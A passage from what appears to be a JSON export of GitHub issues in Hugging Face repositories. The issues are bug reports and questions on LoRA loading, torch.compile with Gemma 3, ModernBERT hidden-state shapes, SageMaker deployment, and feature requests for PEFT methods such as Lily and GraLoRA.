scheduler\npipe.load_lora_weights(\"lora/customdiffusers_lora.safetensors\")\netc...\n\nit runs without error but the effect was not applied, and I see the following warning: \nNo LoRA keys associated to WanTransformer3DModel found with the prefix='transformer'. This is safe to ignore if LoRA state dict didn't originally have any WanTransformer3DModel related params. You can also try specifying `prefix=None` to resolve the warning. Otherwise, open an issue if you think it's unexpected: https://github.com/huggingface/diffusers/issues/new\n\nIs there any config file I need to change for this to work? Thanks\n\n### Reproduction\n\nN/A as a custom Lora\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\n0.33, linux, python 3.10\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/11657", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-04T19:50:14Z", "updated_at": "2025-09-12T03:32:17Z", "comments": 3, "user": "st-projects-00" }, { "repo": "huggingface/transformers", "number": 38576, "title": "A local variable 'image_seq_length' leading to UnboundLocalError: cannot access local variable 'image_seq_length' where it is not associated with a value", "body": "### System Info\n\n- `transformers` version: 4.52.3\n- Platform: Linux-5.15.0-125-generic-x86_64-with-glibc2.35\n- Python version: 3.12.2\n- Huggingface_hub version: 0.32.2\n- Safetensors version: 0.5.3\n- Accelerate version: 0.26.0\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (GPU?): 2.6.0+cu124 (True)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: \n- Using GPU in script?: \n- GPU type: NVIDIA GeForce RTX 4090\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [x] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nThe code snippet is as follows:\nfrom transformers.utils.attention_visualizer import AttentionMaskVisualizer\n\nvisualizer = AttentionMaskVisualizer(\"meta-llama/Llama-2-7b-hf\")\nvisualizer(\"Plants create energy through a process known as\")\n\nIn the Class AttentionMaskVisualizer, a local variable in the first branch (lines 181-201), 'image_seq_length,' is passed to the function (line 232). However, in the text case, the branch will not be executed, and it will lead to UnboundLocalError: cannot access local variable 'image_seq_length' where it is not associated with a value.\n\n### Expected behavior\n\nNone", "url": "https://github.com/huggingface/transformers/issues/38576", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-04T09:06:04Z", "updated_at": "2025-06-04T12:20:33Z", "user": "IceGiraffe" }, { "repo": "huggingface/lerobot", "number": 1195, "title": "ros2_control support", "body": "Hello,\n\nI was thinking that it would be great to use the robot with ros2_control :\n\n- to test code developped with the ROS2 framework:\n- for education purposes : the robot is great, easily and not expensive to build (thank you for the work achieved), transporteable in a case, etc.\n\nDo you have any knowledge of an existing project ?\nIf not, would you be interested in this kind of implementation ?\n\nBest,\nAline", "url": "https://github.com/huggingface/lerobot/issues/1195", "state": "open", "labels": [ "enhancement", "question" ], "created_at": "2025-06-03T15:31:53Z", "updated_at": "2025-11-27T16:30:08Z", "user": "baaluidnrey" }, { "repo": "huggingface/diffusers", "number": 11648, "title": "how to load lora weight with fp8 transfomer model?", "body": "Hi, I want to run fluxcontrolpipeline with transformer_fp8 reference the code : \nhttps://huggingface.co/docs/diffusers/api/pipelines/flux#quantization\n\n```\nimport torch\nfrom diffusers import BitsAndBytesConfig as DiffusersBitsAndBytesConfig, FluxTransformer2DModel, FluxControlPipeline\nfrom transformers import BitsAndBytesConfig as BitsAndBytesConfig, T5EncoderModel\n\nquant_config = BitsAndBytesConfig(load_in_8bit=True)\ntext_encoder_8bit = T5EncoderModel.from_pretrained(\n \"black-forest-labs/FLUX.1-dev\",\n subfolder=\"text_encoder_2\",\n quantization_config=quant_config,\n torch_dtype=torch.float16,\n)\n\nquant_config = DiffusersBitsAndBytesConfig(load_in_8bit=True)\ntransformer_8bit = FluxTransformer2DModel.from_pretrained(\n \"black-forest-labs/FLUX.1-dev\",\n subfolder=\"transformer\",\n quantization_config=quant_config,\n torch_dtype=torch.float16,\n)\n\npipeline = FluxControlPipeline.from_pretrained(\n \"black-forest-labs/FLUX.1-dev\",\n text_encoder_2=text_encoder_8bit,\n transformer=transformer_8bit,\n torch_dtype=torch.float16,\n device_map=\"balanced\",\n)\n\nprompt = \"a tiny astronaut hatching from an egg on the moon\"\nimage = pipeline(prompt, guidance_scale=3.5, height=768, width=1360, num_inference_steps=50).images[0]\nimage.save(\"flux.png\")\n```\n\nbut when I load lora after build a pipeline\n\n```\npipeline = FluxControlPipeline.from_pretrained(\n \"black-forest-labs/FLUX.1-dev\",\n text_encoder_2=text_encoder_8bit,\n transformer=transformer_8bit,\n torch_dtype=torch.float16,\n device_map=\"balanced\",\n)\n\npipe.load_lora_weights(\"black-forest-labs/FLUX.1-Depth-dev-lora\")\n```\nThere a error:\nnot support fp8 weight , how to fix it??\n\n", "url": "https://github.com/huggingface/diffusers/issues/11648", "state": "open", "labels": [], "created_at": "2025-06-03T10:31:23Z", "updated_at": "2025-06-19T12:37:35Z", "user": "Johnson-yue" }, { "repo": "huggingface/candle", "number": 2986, "title": "How to reset gradient before each batch", "body": "In Pytorch, you would call `optimizer.zero_grad` to zero the gradients before every batch. How do you do this in candle?", "url": "https://github.com/huggingface/candle/issues/2986", "state": "open", "labels": [], "created_at": "2025-06-03T10:17:52Z", "updated_at": "2025-06-03T10:17:52Z", "user": "lokxii" }, { "repo": "huggingface/transformers", "number": 38544, "title": "Paligemma model card needs update", "body": "Hi \n\nI found a minor problem with paligemma model card. How can I raise a PR to fix it ? I am first time contributor. I raised PR. Whom should I mention to review it ? \nhttps://huggingface.co/google/paligemma-3b-pt-896", "url": "https://github.com/huggingface/transformers/issues/38544", "state": "closed", "labels": [], "created_at": "2025-06-03T06:55:14Z", "updated_at": "2025-07-14T16:23:52Z", "comments": 7, "user": "punitvara" }, { "repo": "huggingface/transformers", "number": 38541, "title": "`eager_attention_forward` and `repeat_kv` code duplication", "body": "I see the two functions appear in a lot of places in the code base. Shall we unify them into a single place?\n\nAnd can we treat `eager_attention_forward` as another option in [`ALL_ATTENTION_FUNCTIONS`](https://github.com/huggingface/transformers/blob/main/src/transformers/modeling_utils.py#L6186)? Any concerns?", "url": "https://github.com/huggingface/transformers/issues/38541", "state": "closed", "labels": [], "created_at": "2025-06-03T00:57:16Z", "updated_at": "2025-06-10T10:27:25Z", "comments": 3, "user": "ChengLyu" }, { "repo": "huggingface/chat-ui", "number": 1843, "title": "can you make a release?", "body": "The current codebase is far away from the official release in November, maybe you can stabilize and release current code?", "url": "https://github.com/huggingface/chat-ui/issues/1843", "state": "open", "labels": [ "enhancement" ], "created_at": "2025-06-02T21:26:51Z", "updated_at": "2025-07-21T20:44:03Z", "comments": 1, "user": "antonkulaga" }, { "repo": "huggingface/transformers", "number": 38527, "title": "Why do you remove sample_indices_fn for processor.apply_chat_template?", "body": "Just as shown in the picture, since 4.52 processor.apply_chat_template does no longer support sample_indices_fn but the args doc is still there. \n\n\"Image\"", "url": "https://github.com/huggingface/transformers/issues/38527", "state": "closed", "labels": [], "created_at": "2025-06-02T12:34:23Z", "updated_at": "2025-06-03T02:44:22Z", "comments": 1, "user": "futrime" }, { "repo": "huggingface/optimum", "number": 2284, "title": "Error when exporting DinoV2 with Registers", "body": "When trying :\n\n` python -m scripts.convert --quantize --model_id facebook/dinov2-with-registers-small`\n\nI Got : \n\n`ValueError: Trying to export a dinov2-with-registers model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type dinov2-with-registers to be supported natively in the ONNX export.`", "url": "https://github.com/huggingface/optimum/issues/2284", "state": "closed", "labels": [ "Stale" ], "created_at": "2025-06-02T08:53:55Z", "updated_at": "2025-07-04T02:16:54Z", "comments": 1, "user": "elkizana" }, { "repo": "huggingface/agents-course", "number": 523, "title": "[QUESTION] The final quiz of Unit 1, always crashes with dataset not found", "body": "First, the **best way to get a response fast is to ask the community** in our Discord server: https://www.hf.co/join/discord\n\nHowever, if you prefer you can ask here, please **be specific**.\n\nDataset 'agents-course/unit_1_quiz' doesn't exist on the Hub or cannot be accessed. \n\nThe full log is: \n\n```\nTraceback (most recent call last):\n File \"/home/user/app/app.py\", line 28, in \n ds = load_dataset(EXAM_DATASET_ID, split=\"train\")\n File \"/usr/local/lib/python3.10/site-packages/datasets/load.py\", line 2129, in load_dataset\n builder_instance = load_dataset_builder(\n File \"/usr/local/lib/python3.10/site-packages/datasets/load.py\", line 1849, in load_dataset_builder\n dataset_module = dataset_module_factory(\n File \"/usr/local/lib/python3.10/site-packages/datasets/load.py\", line 1719, in dataset_module_factory\n raise e1 from None\n File \"/usr/local/lib/python3.10/site-packages/datasets/load.py\", line 1645, in dataset_module_factory\n raise DatasetNotFoundError(f\"Dataset '{path}' doesn't exist on the Hub or cannot be accessed.\") from e\ndatasets.exceptions.DatasetNotFoundError: Dataset 'agents-course/unit_1_quiz' doesn't exist on the Hub or cannot be accessed.\nTraceback (most recent call last):\n File \"/home/user/app/app.py\", line 28, in \n ds = load_dataset(EXAM_DATASET_ID, split=\"train\")\n File \"/usr/local/lib/python3.10/site-packages/datasets/load.py\", line 2129, in load_dataset\n builder_instance = load_dataset_builder(\n File \"/usr/local/lib/python3.10/site-packages/datasets/load.py\", line 1849, in load_dataset_builder\n dataset_module = dataset_module_factory(\n File \"/usr/local/lib/python3.10/site-packages/datasets/load.py\", line 1719, in dataset_module_factory\n raise e1 from None\n File \"/usr/local/lib/python3.10/site-packages/datasets/load.py\", line 1645, in dataset_module_factory\n raise DatasetNotFoundError(f\"Dataset '{path}' doesn't exist on the Hub or cannot be accessed.\") from e\ndatasets.exceptions.DatasetNotFoundError: Dataset 'agents-course/unit_1_quiz' doesn't exist on the Hub or cannot be accessed.\n ```\n\nAm I missing something trivial? \n", "url": "https://github.com/huggingface/agents-course/issues/523", "state": "open", "labels": [ "question" ], "created_at": "2025-06-02T07:58:01Z", "updated_at": "2025-06-02T07:58:01Z", "user": "abcnishant007" }, { "repo": "huggingface/peft", "number": 2563, "title": "Integrate Lily", "body": "### Feature request\n\nThis request proposes integrating Lily (Low-Rank Interconnected Adaptation across Layers), accepted to ACL 2025 Findings, into the PEFT library. \nPaper: https://arxiv.org/pdf/2407.09946 \nRepo: https://github.com/yibozhong/lily \n\n\n### Motivation\n\nLily aims to directly make the rank of each individual adapter bigger under the same parameter budget, as it's shown in many papers that higher ranks are beneficial to PEFT performance. This is achieved by breaking the pair-AB-per-layer constraint of LoRA. That is, we do not give each layer a dedicated pair of A and B. Rather, we decouple all the Bs from the layer, and when adapting at each layer, we use a weighted sum of these Bs as the B for this layer. The weight is calculated by a lightweight trainable router, currently data-dependent. \n\n![Image](https://github.com/user-attachments/assets/809c25a4-63f5-4ec7-bdb4-98a8f869f328) \n\nSeveral points worth noting: \n- The method looks somewhat similar to MosLoRA in structure, but it operates at the model level and the aim is to increase the individual rank of each adapter with dynamic adaptation. \n- Currently in the paper, we use a data-dependent router, which makes it tricky to merge the weights. I do not observe notable inference latency, possibly due to small model size, but an option for using a non-data-dependent router can be included and enable easy merging the weights. \n- The current As are still positioned at a fixed layer (using layer-wise sharing to reduce params). However, it also can be decoupled, simply by providing two routers for weighting As and Bs respectively, rather than one router for B in the current setup. This is a more elegant design and shares the same principle as Lily. After I run quick experiments demonstrating its effectiveness, I can integrate this setup into my current code as Lily v2. \n\n### Your contribution\n\nImplement Lily, repo: https://github.com/yibozhong/lily. ", "url": "https://github.com/huggingface/peft/issues/2563", "state": "closed", "labels": [], "created_at": "2025-06-02T07:23:30Z", "updated_at": "2025-12-18T14:03:32Z", "comments": 15, "user": "yibozhong" }, { "repo": "huggingface/lerobot", "number": 1180, "title": "dataset training", "body": "How many episodes do you recommend making for each file when learning the dataset? Can I create about 400 episodes by putting different tasks in each episode? Or can I create the same task data for each file and combine multiple files?", "url": "https://github.com/huggingface/lerobot/issues/1180", "state": "closed", "labels": [ "question", "dataset" ], "created_at": "2025-06-01T15:59:47Z", "updated_at": "2025-10-08T12:54:48Z", "user": "bruce577" }, { "repo": "huggingface/lerobot", "number": 1177, "title": "[Question] Why using a kernel device for IP cameras?", "body": "I'm wondering why, when we have an IP camera (by using DroidCam on Android for instance), the team decided to plug the IP camera into a loopback device in `/dev/videoX` instead of directly reading the video stream in the code with Opencv `cv2.VideoCapture(url)`. I understand doing this allows controlling FPS & resolution which is not possible when `cv2.VideoCapture(url)` is used directly, however the downside is that you need to map the camera to a kernel device which becomes really cumbersome, especially when you need root access and when the device gets stuck in a weird state.\n\nWhy didn't the team simply read the video stream from `cv2.VideoCapture(url)` and then downsized the video stream inside the code loop? (The only downside of doing this I found is that we can't get 30fps if the stream outputs only 25fps but this shouldn't be a problem imo since `OpenCVCamera.read_loop` adds a 0.1 latency which messes up the fps sync anyways).", "url": "https://github.com/huggingface/lerobot/issues/1177", "state": "closed", "labels": [ "question", "robots", "stale" ], "created_at": "2025-05-31T05:24:21Z", "updated_at": "2025-12-31T02:35:18Z", "user": "godardt" }, { "repo": "huggingface/transformers", "number": 38501, "title": "torch.compile fails for gemma-3-1b-it", "body": "### System Info\n\n- `transformers` version: 4.52.4\n- Platform: Linux-6.15.0-1-MANJARO-x86_64-with-glibc2.41\n- Python version: 3.12.8\n- Huggingface_hub version: 0.32.3\n- Safetensors version: 0.5.3\n- Accelerate version: 1.7.0\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (GPU?): 2.7.0+cu126 (True)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: no\n- Using GPU in script?: yes\n- GPU type: NVIDIA GeForce RTX 3090 Ti\n\n### Who can help?\n\n@ArthurZucker @gante \n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nRunning `TORCHDYNAMO_VERBOSE=1 TORCH_LOGS=\"+dynamo\" uv run main.py` fails:\n\n
\nMinimal reproducible example\n\n```python\nimport torch\nfrom transformers import GemmaTokenizer, Gemma3ForCausalLM\n\n\nckpt = \"google/gemma-3-1b-it\"\nmodel = Gemma3ForCausalLM.from_pretrained(\n ckpt,\n device_map=\"cuda:0\",\n torch_dtype=torch.bfloat16,\n)\nprocessor = GemmaTokenizer.from_pretrained(ckpt)\n\n\nmessages = [{\"role\": \"user\", \"content\": \"What is 2^7-2^4??\"}]\ninputs = processor.apply_chat_template(\n messages,\n add_generation_prompt=True,\n tokenize=True,\n return_dict=True,\n return_tensors=\"pt\",\n).to(model.device)\n\n\ninput_len = inputs[\"input_ids\"].shape[-1]\n\n\n# generate_fn = model.generate\n\ngenerate_fn = torch.compile(model.generate, fullgraph=True)\n\ngeneration = generate_fn(**inputs, max_new_tokens=100, do_sample=False)\ngeneration = generation[0][input_len:]\n\n\ndecoded = processor.decode(generation, skip_special_tokens=True)\nprint(decoded)\n```\n\n
\n\n
\nStack trace\n\nFull paste: https://pastebin.com/V103pCWM\n\n```\n File \"/tmp/gemma_torch/.venv/lib/python3.12/site-packages/torch/_dynamo/variables/builtin.py\", line 2111, in call_deepcopy\n unimplemented(f\"copy.deepcopy {repr(x)}\")\n File \"/tmp/gemma_torch/.venv/lib/python3.12/site-packages/torch/_dynamo/exc.py\", line 439, in unimplemented\n raise Unsupported(msg, case_name=case_name)\ntorch._dynamo.exc.Unsupported: copy.deepcopy UserDefinedObjectVariable(GenerationConfig)\n\nfrom user code:\n File \"/tmp/gemma_torch/.venv/lib/python3.12/site-packages/torch/_dynamo/external_utils.py\", line 70, in inner\n return fn(*args, **kwargs)\n File \"/tmp/gemma_torch/.venv/lib/python3.12/site-packages/torch/utils/_contextlib.py\", line 116, in decorate_context\n return func(*args, **kwargs)\n File \"/tmp/gemma_torch/.venv/lib/python3.12/site-packages/transformers/generation/utils.py\", line 2354, in generate\n generation_config, model_kwargs = self._prepare_generation_config(\n File \"/tmp/gemma_torch/.venv/lib/python3.12/site-packages/transformers/generation/utils.py\", line 1744, in _prepare_generation_config\n generation_config = copy.deepcopy(generation_config)\n\n```\n\n
\n\n### Expected behavior\n\nCompilation proceeds", "url": "https://github.com/huggingface/transformers/issues/38501", "state": "closed", "labels": [ "bug" ], "created_at": "2025-05-30T21:01:41Z", "updated_at": "2025-06-02T20:45:54Z", "comments": 6, "user": "InCogNiTo124" }, { "repo": "huggingface/transformers", "number": 38500, "title": "Unable to deploy Gemma 3 on AWS SageMaker due to lack of support in tranfomers release", "body": "hi,\n\nit seems when i deploy the model\n\n```\nhuggingface_model = HuggingFaceModel(\n model_data=model_s3_uri, \n role=role,\n transformers_version=\"4.49.0\", \n pytorch_version=\"2.6.0\",\n py_version=\"py312\",\n)\n\npredictor = huggingface_model.deploy(\n instance_type=\"ml.g5.48xlarge\",\n initial_instance_count=1,\n endpoint_name=\"gemma-27b-inference\",\n container_startup_health_check_timeout=900\n)\n\nresponse = predictor.predict({\n \"inputs\": \"what can i do?\"\n})\nprint(response)\n```\n\n```\nModelError: An error occurred (ModelError) when calling the InvokeEndpoint operation: Received client error (400) \nfrom primary with message \"{\n \"code\": 400,\n \"type\": \"InternalServerException\",\n \"message\": \"The checkpoint you are trying to load has model type gemma3_text but Transformers does not \nrecognize this architecture. This could be because of an issue with the checkpoint, or because your version of \nTransformers is out of date.\\n\\nYou can update Transformers with the command pip install --upgrade transformers.\n```\n\nnow i know HuggingFaceModel doesnt support anything above 4.49.0 so if i try to run 4.50.0 it will give an error saying please use this version. the thing is gemma3 is not available in 4.49 so how to fix this? i have the model in my bucket trained just cant deploy it due to the versions of transformers. is there a way to override the container inside the huggingface that takes a more advanced transformer?\n\nI did this, but the issue now is in sagemaker, cuz i cannot use this for the huggingface version as it doesn't support it\npip install git+https://github.com/huggingface/transformers@v4.49.0-Gemma-3", "url": "https://github.com/huggingface/transformers/issues/38500", "state": "closed", "labels": [], "created_at": "2025-05-30T17:10:22Z", "updated_at": "2025-07-08T08:02:37Z", "comments": 2, "user": "ehrun32" }, { "repo": "huggingface/transformers", "number": 38499, "title": "ModernBERT for MLM outputs incorrect hidden state shape.", "body": "### System Info\n\nWhen using `ModernBERTForMaskedLM` with `output_hidden_states=True` the hidden state is not correctly padded when it is returned. A minimal example is included below:\n\n```\nimport torch\nfrom transformers import AutoTokenizer, ModernBertForMaskedLM\n\ntokenizer = AutoTokenizer.from_pretrained(\"answerdotai/ModernBERT-base\")\nmodel = ModernBertForMaskedLM.from_pretrained(\"answerdotai/ModernBERT-base\").to(\"cuda\")\n\ninputs = tokenizer(\n [\n \"The capital of France is .\",\n \"The name of the first president of the united states is .\",\n ],\n padding=True,\n return_tensors=\"pt\",\n).to(\"cuda\")\n\nwith torch.no_grad():\n outputs = model(**inputs, output_hidden_states=True)\n\nprint(inputs[\"attention_mask\"].sum())\n# >>> 26\nprint(outputs.hidden_states[-1].shape)\n# >>> torch.Size([26, 768])\n\n\nassert outputs.hidden_states[-1].shape == inputs[\"input_ids\"].shape + (\n model.config.hidden_size,\n)\n```\n\nI'm using the following library versions:\n- `transformers==4.48.2`\n- `torch==2.6.0`\n\nIt appears that what is returned is the flattened version as the tensor is 2D and the first dimension corresponds to the sum of the attention mask. This issue doesn't happen when using the non MLM version.\n\nI searched modern bert and hidden state and looked at the recent commits and didn't see any mention of this issue, but it might have been fixed in a newer version without it being obvious.\n\n\n\n### Who can help?\n\n@ArthurZucker \n\n### Information\n\n- [x] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nRun the code provided in the issue with flash attention on a Cuda GPU.\n\n### Expected behavior\n\nThe hidden states should have shape [batch size, max sequence length, model dim] but they have shape [unknown dim (I think the number of unpadded tokens), model dim].", "url": "https://github.com/huggingface/transformers/issues/38499", "state": "closed", "labels": [ "bug" ], "created_at": "2025-05-30T17:02:55Z", "updated_at": "2025-07-08T08:02:39Z", "comments": 2, "user": "jfkback" }, { "repo": "huggingface/lerobot", "number": 1174, "title": "[Question] Multi-Rate Sensor and Discrete Event Handling in `lerobot`", "body": "Hello `lerobot` Team,\n\nFirst off, huge thanks for building such an awesome open-source project!\n\nI'm currently exploring `lerobot` for a project and have some critical questions regarding its data handling, specifically for multi-rate sensors and discrete events. My understanding from the README is that `lerobot` records at a fixed `fps`, creating a table with `fps * record_time` rows.\n\nThis leads to two primary concerns:\n\n1. **Multi-Rate Sensors:**\n Consider a sensor like an IMU operating at 1KHz, while other sensors might be at much lower rates. To capture the IMU data without loss, the `fps` would need to be set extremely high, to match highest-rate-sensor. This implies:\n * **Massive Data Redundancy:** A significant portion of rows would contain sparse information from the lower-rate sensors.\n * **Recording Performance:** Could such a high `fps` and resulting data volume negatively impact recording performance, potentially making it infeasible to capture this type of data?\n * **Storage Load:** This approach would also lead to very large dataset sizes.\n Am I correct in this interpretation? If so, how does `lerobot` effectively manage multi-rate sensor data to mitigate these issues?\n\n2. **Discrete Events:**\n How are discrete events, such as keyboard presses/releases or joystick button presses, recorded into a `LeRobotDataset`? The current design of `LeRobotDataset`, particularly `__nextitem__` and `delta_timestamps`, seems to implicitly assume continuous data that can be interpolated. How does `lerobot` accommodate and represent these non-continuous, event-driven data points within its framework?\n\nA quick response addressing these points would be incredibly helpful for our ongoing development.\n\nThanks for your time and insight!", "url": "https://github.com/huggingface/lerobot/issues/1174", "state": "open", "labels": [ "question", "dataset" ], "created_at": "2025-05-30T09:04:13Z", "updated_at": "2025-12-17T10:44:46Z", "user": "MilkClouds" }, { "repo": "huggingface/transformers", "number": 38489, "title": "VLM reverse mapping logic in modeling_utils.py save_pretrained not doing anything?", "body": "### System Info\n\ntransformers version: 4.52.3\nPlatform: Ubuntu 24.04\nPython version: 3.11.0\nHuggingface_hub version: 0.32.2\nSafetensors version: 0.5.3\nAccelerate version: 1.7.0\nAccelerate config: not found\nDeepSpeed version: not installed\nPyTorch version (GPU?): 2.7.0+cu126 (H100)\nTensorflow version (GPU?): not installed (NA)\nFlax version (CPU?/GPU?/TPU?): not installed (NA)\nJax version: not installed\nJaxLib version: not installed\nUsing distributed or parallel set-up in script?: No\nUsing GPU in script?: No\nGPU type: NVIDIA H100\n\n### Who can help?\n\n@amyeroberts @zucchini-nlp \n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nborrowing the reverse key mapping logic in the modeling_utils.py save_pretrained method as shown here:\nhttps://github.com/huggingface/transformers/blob/main/src/transformers/modeling_utils.py#L3649\nIf we also use the qwen2 model mappings for Qwen2ForConditionalGeneration as an example\nand a sample of keys as shown below to test the reversal logic:\n\n```\nimport re\nfrom transformers import Qwen2VLForConditionalGeneration\ncheckpoint_conversion_mapping = Qwen2VLForConditionalGeneration._checkpoint_conversion_mapping\n\ncheckpoint_keys = [\n 'model.language_model.layers.9.post_attention_layernorm.weight', # Should be remapped\n 'model.layers.9.self_attn.k_proj.bias', # Should not be remapped\n 'model.visual.blocks.0.attn.proj.bias', # Should be remapped\n 'visual.blocks.0.attn.proj.weight', # Should not be remapped\n]\n\nreverse_key_mapping = {v: k for k, v in checkpoint_conversion_mapping.items()}\nfor key in checkpoint_keys:\n print(f\"\\nOperating on sample key: {key}:\")\n for pattern, replacement in reverse_key_mapping.items():\n replacement = replacement.lstrip(\"^\") # strip off un-needed chars and patterns\n replacement = re.sub(r\"\\(.*?\\)\", \"\", pattern)\n key, n_replace = re.subn(pattern, replacement, key)\n print(f\"pattern: {pattern}, replacement: {replacement}, resultant key: {key}\")\n # Early exit of the loop\n if n_replace > 0:\n print(f\"Result: final mapped key is {key}\")\n break\n else:\n print(f\"Result: no mappings performed\")\n```\nreturns the following output where no mapping reversal is performed where it should be.\n```\nOperating on sample key: model.language_model.layers.9.post_attention_layernorm.weight:\npattern: model.visual, replacement: model.visual, resultant key: model.language_model.layers.9.post_attention_layernorm.weight\nResult: no mappings performed\npattern: model.language_model, replacement: model.language_model, resultant key: model.language_model.layers.9.post_attention_layernorm.weight\nResult: final mapped key is model.language_model.layers.9.post_attention_layernorm.weight\n\nOperating on sample key: model.layers.9.self_attn.k_proj.bias:\npattern: model.visual, replacement: model.visual, resultant key: model.layers.9.self_attn.k_proj.bias\nResult: no mappings performed\npattern: model.language_model, replacement: model.language_model, resultant key: model.layers.9.self_attn.k_proj.bias\nResult: no mappings performed\n\nOperating on sample key: model.visual.blocks.0.attn.proj.bias:\npattern: model.visual, replacement: model.visual, resultant key: model.visual.blocks.0.attn.proj.bias\nResult: final mapped key is model.visual.blocks.0.attn.proj.bias\n\nOperating on sample key: visual.blocks.0.attn.proj.weight:\npattern: model.visual, replacement: model.visual, resultant key: visual.blocks.0.attn.proj.weight\nResult: no mappings performed\npattern: model.language_model, replacement: model.language_model, resultant key: visual.blocks.0.attn.proj.weight\nResult: no mappings performed\n```\n\n### Expected behavior\n\nThe expected behavior should be such that we observe the following mapping:\n```\nmodel.language_model.layers.9.post_attention_layernorm.weight -> model.layers.9.post_attention_layernorm.weight\nmodel.visual.blocks.0.attn.proj.bias-> visual.blocks.0.attn.proj.bias\nmodel.layers.9.self_attn.k_proj.bias -> model.layers.9.self_attn.k_proj.bias (remains the same)\nvisual.blocks.0.attn.proj.weight -> visual.blocks.0.attn.proj.weight (remains the same)\n```\n\nThis could be achieved by changing the reversal code inside the for pattern, replacement in reverse_key_mapping.items(): loop to be \n```\nreplacement = replacement.lstrip(\"^\") # strip off un-needed chars and patterns\n replacement = re.sub(r\"\\^?([^(?]+).*\", r\"\\1\", replacement)\n key, n_replace = re.subn(pattern, replacement, key)\n print(f\"pattern: {pattern}, replacement: {replacement}, resultant key: {key}\")\n # Early exit of the loop\n if n_replace > 0:\n break\n``` \ninstead.\n\nI could ", "url": "https://github.com/huggingface/transformers/issues/38489", "state": "closed", "labels": [ "bug" ], "created_at": "2025-05-30T08:55:57Z", "updated_at": "2025-05-30T13:08:58Z", "comments": 6, "user": "rolandtannous" }, { "repo": "huggingface/diffusers", "number": 11637, "title": "How to load lora weight in distribution applications?", "body": "If I want to use xDiT with 2 GPU inference FluxControlPipeline, how should I do\n\nI write a xFuserFluxControlPipeline class, but it can not load lora weight with right way\nxFuserFluxTransformer in 1GPU have some parameters and another GPU have others.\nHow should I do ??", "url": "https://github.com/huggingface/diffusers/issues/11637", "state": "open", "labels": [], "created_at": "2025-05-30T07:14:50Z", "updated_at": "2025-06-03T10:15:51Z", "user": "Johnson-yue" }, { "repo": "huggingface/peft", "number": 2558, "title": "GraLoRA support?", "body": "### Feature request\n\nwill the library support the [GraLoRA](https://arxiv.org/abs/2505.20355) technique?\n\n### Motivation\n\nGraLoRA addresses a fundamental limitation of LoRA: overfitting when the bottleneck is widened.\n\nThe technique seems to more closely approximate full fine-tuning; hybrid GraLoRA gets the best of both worlds, with LoRA benefiting from low-rank scenarios (16 or less) and GraLoRA from high-rank scenarios (16 to 128).\n\nThe authors have a modified peft library; would be nice to have support in the official library.\n\n### Your contribution\n\nI have limited time for the next two weeks. Then, I will be able to contribute.\n\nBut should be very easy for the authors to port the implementation; most of it in the [gralora](https://github.com/SqueezeBits/GraLoRA/tree/8dff8438c80969f5f11f23249fed62aac9d687e8/peft/src/peft/tuners/gralora) sub-package.", "url": "https://github.com/huggingface/peft/issues/2558", "state": "closed", "labels": [], "created_at": "2025-05-29T18:36:27Z", "updated_at": "2025-07-15T15:04:20Z", "comments": 10, "user": "DiTo97" }, { "repo": "huggingface/lerobot", "number": 1171, "title": "sync_read.py", "body": "Hi, I am currently testing the functions in the STServo_Python folder to work with my STS3215 motors. When I run the sync_read.py script, I encounter an issue caused by the addParam(self, sts_id) function returning False. I tried several things, but I can't get past the error.\nI made sure that the motor IDs are correct and that the motors are connected and powered. I'm using a GroupSyncRead object with a start_address of SCSCL_PRESENT_POSITION_L and data_length of 4. Still, addParam() fails, and the motor ID is not added to the list.\n\nDoes anyone know why this is happening or how to fix it?\n\nThanks in advance!", "url": "https://github.com/huggingface/lerobot/issues/1171", "state": "closed", "labels": [ "bug", "question", "robots", "stale" ], "created_at": "2025-05-29T15:33:16Z", "updated_at": "2025-12-31T02:35:19Z", "user": "Baptiste-le-Beaudry" }, { "repo": "huggingface/candle", "number": 2974, "title": "Any good first issues a newcomer could tackle?", "body": "Hey! I've been using this crate for a while now and would love to start contributing back! I notice that your issues aren't labelled, who should I contact/do you have a list of issues that would be good for me?", "url": "https://github.com/huggingface/candle/issues/2974", "state": "open", "labels": [], "created_at": "2025-05-29T04:19:18Z", "updated_at": "2025-05-30T18:25:37Z", "comments": 3, "user": "Heidar-An" }, { "repo": "huggingface/xet-core", "number": 358, "title": "How can I have snapshot_download to have continue feature? Errors became very common", "body": "Whenever some error happens and i run same code, it starts from 0\n\nIt is XET enabled repo and hf xet installed\n\nI really need to have resume feature\n\nmy entire code\n\n\n```\nfrom huggingface_hub import snapshot_download\nimport os\nimport argparse\n\ndef download_models(target_dir=None):\n \"\"\"\n Download models from HuggingFace hub to specified directory\n \n Args:\n target_dir (str, optional): Target directory for downloads. \n If None, uses current working directory\n \"\"\"\n # Set repo ID\n repo_id = 